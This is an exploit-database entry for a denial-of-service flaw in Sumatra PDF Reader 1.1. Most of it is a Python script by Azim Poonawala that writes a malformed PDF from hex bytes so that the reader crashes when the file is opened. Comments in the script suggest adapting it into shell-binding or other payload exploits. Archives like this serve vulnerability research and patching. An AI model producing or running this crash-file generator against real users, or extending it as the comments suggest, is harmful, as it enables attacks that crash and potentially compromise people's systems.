header-logo
Suggest Exploit
vendor:
Sumatra PDF Reader
by:
Azim Poonawala
N/A
CVSS
N/A
Denial-of-Service
CWE
Product Name: Sumatra PDF Reader
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

Unspecified Denial-of-Service Vulnerability in Sumatra PDF

An attacker can exploit this issue to crash the affected application, resulting in a denial-of-service condition.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41276/info

Sumatra PDF is prone to an unspecified denial-of-service vulnerability.

An attacker can exploit this issue to crash the affected application, resulting in a denial-of-service condition.

Sumatra PDF 1.1 is vulnerable; other versions may also be affected. 

###########################################################################
###########################################################################
######## SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator ########
###########################################################################
#         Vulnerability Detection Time : 21st June 2010, 1:13 AM          #
#	    Tested on version 1.1 of Sumara PDF Reader                      #
#         Nature : Accidental Discovery                                   #
###########################################################################
# Description : Sumatra PDF Reader crashed while testing recovered PDF    #
#               Files from a HardDisk. PDF Files recovered using Forensic #
#               Tools were large in size. DoS code has been optimised to  #
#               implement the crash with reduced file-size.               #
# Notes : This source can be modified after analyzing the crash appcompat #
#         files to write shell bind / other payloaded exploits.           #
#         Sumatra PDR Reader crashed when  PDF Files were already         #
#         associated to launch it.
#                                                                         #
# Thanks to Felicity. Hope you got your files back :-)                    #
###########################################################################
# Vulnerability Discoverer : Azim Poonawala [ QUAKERDOOMER ]              #
# Email : quakerdoomer [ @ ] fmguy.com                                    # 
###########################################################################
###########################################################################


#!/usr/bin/python
# Usage: python sumatra_pdf_v1.1_DoS_file.py

data = (
	"\x25\x50\x44\x46\x2D\x31\x2E\x34\x0D\x25\xE2\xE3\xCF\xD3\x0D\x0A" +
	"\x36\x20\x30\x20\x6F\x62\x6A\x3C\x3C\x2F\x48\x5B\x36\x37\x36\x20" +
	"\x31\x35\x37\x5D\x2F\x4C\x69\x6E\x65\x61\x72\x69\x7A\x65\x64\x20" +
	"\x31\x2F\x45\x20\x31\x34\x38\x30\x32\x2F\x4C\x20\x31\x38\x37\x31" +
	"\x39\x2F\x4E\x20\x31\x2F\x4F\x20\x39\x2F\x54\x20\x31\x38\x35\x35" +
	"\x33\x3E\x3E\x0D\x65\x6E\x64\x6F\x62\x6A\x0D\x20\x20\x20\x20\x20" +
	"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" +
	"\x20\x20\x0D\x0A\x78\x72\x65\x66\x0D\x0A\x36\x20\x31\x39\x0D\x0A" +
	"\x30\x30\x30\x30\x30\x30\x30\x30\x31\x36\x20\x30\x30\x30\x30\x30" +
	"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x38\x33\x33\x20\x30" +
	"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x36" +
	"\x37\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30" +
	"\x30\x30\x30\x39\x30\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A" +
	"\x30\x30\x30\x30\x30\x30\x31\x30\x33\x38\x20\x30\x30\x30\x30\x30" +
	"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x32\x32\x39\x20\x30" +
	"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x36" +
	"\x38\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30" +
	"\x30\x30\x32\x30\x39\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A" +
	"\x30\x30\x30\x30\x30\x30\x32\x31\x32\x34\x20\x30\x30\x30\x30\x30" +
	"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x31\x36\x38\x20\x30" +
	"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x33\x39" +
	"\x34\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30" +
	"\x30\x30\x34\x33\x33\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A" +
	"\x30\x30\x30\x30\x30\x30\x36\x39\x39\x39\x20\x30\x30\x30\x30\x30" +
	"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x37\x37\x35\x39\x20\x30" +
	"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x37\x39" +
	"\x39\x38\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30" +
	"\x30\x30\x38\x32\x34\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A" +
	"\x30\x30\x30\x30\x30\x30\x38\x34\x39\x38\x20\x30\x30\x30\x30\x30" +
	"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x31\x31\x34\x30\x32\x20\x30" +
	"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x31\x34\x37" +
	"\x32\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x74\x72\x61\x69" +
	"\x6C\x65\x72\x0D\x0A\x3C\x3C\x2F\x53\x69\x7A\x65\x20\x32\x35\x2F" +
	"\x50\x72\x65\x76\x20\x31\x38\x35\x34\x33\x2F\x52\x6F\x6F\x74\x20" +
	"\x37\x20\x30\x20\x52\x2F\x49\x6E\x66\x6F\x20\x35\x20\x30\x20\x52" +
	"\x2F\x49\x44\x5B\x3C\x33\x64\x32\x38\x34\x30\x64\x30\x39\x37\x36" +
	"\x61\x37\x66\x32\x61\x37\x30\x34\x31\x37\x32\x36\x65\x37\x30\x38" +
	"\x33\x38\x31\x62\x30\x3E\x3C\x65\x39\x35\x37\x38\x32\x63\x37\x34" +
	"\x36\x62\x38\x34\x39\x34\x64\x39\x62\x39\x37\x31\x33\x30\x38\x37" +
	"\x31\x38\x33\x36\x62\x34\x39\x3E\x5D\x3E\x3E\x0D\x0A\x73\x74\x61" +
	"\x72\x74\x78\x72\x65\x66\x0D\x0A\x30\x0D\x0A\x25\x25\x45\x4F\x46" +
	"\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" +
	"\x20\x20\x0D\x0A\x38\x20\x30\x20\x6F\x62\x6A\x3C\x3C\x2F\x4C\x65" +
	"\x6E\x67\x74\x68\x20\x38\x30\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46" +
	"\x6C\x61\x74\x65\x44\x65\x63\x6F\x64\x65\x2F\x4C\x20\x39\x30\x2F" +
	"\x53\x20\x34\x30\x3E\x3E\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\xDA" +
	"\x62\x60\x60\x10\x60\x60\x60\xFA\xC0\x20\x04\x66\xAE\x0C\xA8\x80" +
	"\x19\x88\x59\x18\x38\x16\x80\xD5\xC0\x81\x20\x03\x8C\xAF\xC4\xC0" +
	"\xC3\xFA\x61\xAE\x54\x61\x11\x03\x03\x57\xCE\xC2\x94\x25\x9B\xAE" +
	"\xF1\x5C\xB8\xCC\x7B\xDB\xEC\xEC\x02\x2D\xB0\x3C\x23\x03\x83\xA5" +
	"\x29\x90\x66\x02\x62\x0B\x80\x20\x03\x20\x10\xE9\x0D\xCE\x0D\x0A" +
	"\x65\x6E\x64\x73\x74\x72\x65\x61\x6D\x0D\x65\x6E\x64\x6F\x62\x6A" +
	"\x0D\x37\x20\x30\x20\x6F\x62\x6A\x3C\x3C\x2F\x50\x61\x67\x65\x73" +
	"\x20\x33\x20\x30\x20\x52\x2F\x54\x79\x70\x65\x2F\x43\x61\x74\x61" +
	"\x6C\x6F\x67\x2F\x50\x61\x67\x65\x4C\x61\x62\x65\x6C\x73\x20\x31" +
	"\x20\x30\x20\x52\x2F\x4D\x65\x74\x61\x64\x61\x74\x61\x20\x34\x20" +
	"\x30\x20\x52\x3E\x3E\x0D\x65\x6E\x64\x6F\x62\x6A"
);

try:
    f1 = open("SumatraPDF_Reader_1.1_crasher_DoS.pdf","w")
    f1.write(data)
    f1.close()
    print("\nPDF file created ! : [SumatraPDF_Reader_1.1_crasher_DoS.pdf]\nLaunch it to run under Sumatra PDF Reader v1.1 to test crash.\n\nNOTE : 
Launching Sumatra PDF Reader and then using File/Open Ctrl+O to open\nthis file WON'T cause a DoS\n")
    print("Written by : Azim Poonawala (QUAKERDOOMER) [ quakerdoomer [ @ ] fmguy.com 
]\n\t\thttp:/solidmecca.co.nr\n\t\thttp://winautopwn.co.nr\n\t\thttp://my.opera.com/quakerdoomer");
except:
    print "Error"